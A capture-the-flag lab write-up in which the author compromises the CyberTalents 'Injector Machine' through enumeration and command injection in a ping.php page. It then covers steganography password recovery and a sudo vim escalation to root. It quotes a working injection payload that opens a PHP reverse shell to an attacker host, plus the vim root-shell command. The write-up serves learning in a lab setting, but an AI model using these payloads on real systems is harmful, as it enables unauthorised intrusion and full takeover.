Cybertalents Injector Machine
Hello, I’m Omar! i hope y’all safe and still following me after my last writeup xD Today i’ll share with you my writeup for Injector Machine from Cybertalents.
First of all, you should connect to CyberTalents VPN , You will see the instructions in the file given.
I’ll start with the enumeration.
Hmm, we find port 22 opened for ssh, and 80 for http(web server) running under Apache/2.4.29
let’s Discover the webserver….
Sorry for my weak machine :”
We’ll See a Default Apache page it’s automatically generated when you install apache.
Nothing got my attention or interested , let’s discover the hidden directories & file using dirsearch
dirsearch -u http://172.24.170.117/ -e * we will get this result
the secret directory is interesting,
let’s open the directory in browser
nothing interesting, let’s discover what’s on using same command-line.
when i found admin.html i stopped the tool i go admin.html and said finally then the page loaded :)
i run the tool again and let the tool complete the scan :D
i went to all directories and found /tools didn’t troll me in /tools i found “ping.php”
before i join i was know it’s will be a Command Injection Vulnerability
Okay open the php page, we will see input if we put 127.0.0.1 and click lookup the server will ping the ip.
It’s so simple, let’s get a quick reverse shell.
i’ll using php for reverse shell and my command is
127.0.0.1; php -r '$sock=fsockopen("172.24.143.xx",1337);exec("/bin/sh -i <&3 >&3 2>&3");'
before you execute the command we should make a netcat listener first.
and then click lookup in the web-page
Okay, we now got a reverse shell.
Let’s spawn a terminal i don’t know why but i do it, using
python3 -c 'import pty;pty.spawn("/bin/bash")';
now we’re on www-data we should get a user, after 2 days of trying & search i back the photo i found in /var/www a jpg photo called TrollFace.jpg.
let’s copy it to our machine using This netcat method
i tried to use strings in the image but useless, i tried
steghide extract -sf TrollFace.jpg without passphrase and it worked !
Lets cat the file
we got a password, lets see our users. just cat /etc/passwd and We will see user alex,
Let’s switch user to alex using ‘su’ and use the password we got from TrollFace.jpg
Let’s do Some Privilege Escalation, Firstly i do sudo -l for show the commands runs with root permissions,
Vim works with Root permissions, Here we go after ask my friend ‘Hameed’ he gave me this command and it’s works well. Thank you!
sudo vim -c ' : ! /bin/sh ' /usr/bin/vim
We got a root shell!
Thank you for reading,any questions? contact me on facebook!